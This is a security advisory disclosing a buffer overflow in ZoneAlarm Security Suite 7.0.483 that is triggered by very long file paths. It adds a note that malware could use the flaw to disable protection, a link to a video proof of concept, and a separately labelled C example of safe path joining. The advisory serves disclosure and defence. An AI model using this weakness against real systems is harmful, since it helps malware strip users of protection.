Application: ZoneAlarm Security Suite
OS: Windows XP (all patches up to date)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description

ZoneAlarm is a well-known firewall; its "Security Suite" edition also bundles tools such as antivirus, antispam and so on.

Details of the version:

ZoneAlarm Security Suite version: 7.0.483.000
TrueVector version: 7.0.483.000
Driver version: 7.0.483.000
Anti-virus engine version: 3
Antivirus engine version: 5.0.1.85
Anti-virus signature DAT file version: 915051681
Anti-spyware engine version: 5.0.189.0
Anti-spyware signature DAT file version: 01.200801.3195
AntiSpam version: 5.0.6.8903
------------------------------------------------------
Vulnerability

The vulnerability arises because the program cannot analyze very long paths. This causes a buffer overflow, with the possibility of code execution. The flaw could be exploited by malware to leave the system without protection, for instance.
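Added example (not part of the original advisory and not ZoneAlarm code): a bounds-checked path join for a scanner that descends nested directories, which refuses an over-long path and marks it as not scanned instead of writing past a fixed buffer. The 260-byte buffer size, the function names and the directory names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define SCAN_PATH_MAX 260 /* assumed fixed buffer size (Windows MAX_PATH) */
enum { JOIN_OK = 0, JOIN_TOO_LONG = -1, JOIN_BAD_ARG = -2 };

/* Builds dir + '\' + name in out[cap]. The unsafe pattern this replaces is a
 * strcpy/strcat chain that never relates the input lengths to cap. On an
 * over-long input nothing is copied and out is left as an empty string. */
int join_checked(char *out, size_t cap, const char *dir, const char *name)
{
    if (!out || cap == 0 || !dir || !name) return JOIN_BAD_ARG;
    size_t dlen = strlen(dir), nlen = strlen(name);
    /* Need dlen + 1 + nlen + 1 <= cap, phrased so the size_t math cannot wrap. */
    if (dlen >= cap || nlen >= cap - dlen || cap - dlen - nlen < 2) {
        out[0] = '\0';
        return JOIN_TOO_LONG;
    }
    memcpy(out, dir, dlen);
    out[dlen] = '\\';
    memcpy(out + dlen + 1, name, nlen + 1); /* copies the terminating NUL too */
    return JOIN_OK;
}

/* Simulates descending `levels` nested directories called `component`.
 * Returns how many levels were joined; *skipped is set to 1 when a path was
 * refused, so the caller can report the object as not scanned. */
int descend(const char *root, const char *component, int levels, int *skipped)
{
    char cur[SCAN_PATH_MAX], next[SCAN_PATH_MAX];
    int done = 0;
    int n = snprintf(cur, sizeof cur, "%s", root);
    *skipped = 0;
    if (n < 0 || (size_t)n >= sizeof cur) { *skipped = 1; return 0; }
    for (; done < levels; done++) {
        if (join_checked(next, sizeof next, cur, component) != JOIN_OK) {
            *skipped = 1; /* never truncate silently, never overflow */
            break;
        }
        memcpy(cur, next, strlen(next) + 1);
    }
    return done;
}

int main(void)
{
    int skipped, depth = descend("C:", "nested_directory_01", 100, &skipped);
    printf("levels joined: %d, refused: %d\n", depth, skipped);
    return 0;
}
```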
------------------------------------------------------
POC/EXPLOIT

Here you can view a video proof of concept:
http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf

------------------------------------------------------
Juan Pablo Lopez Yacubian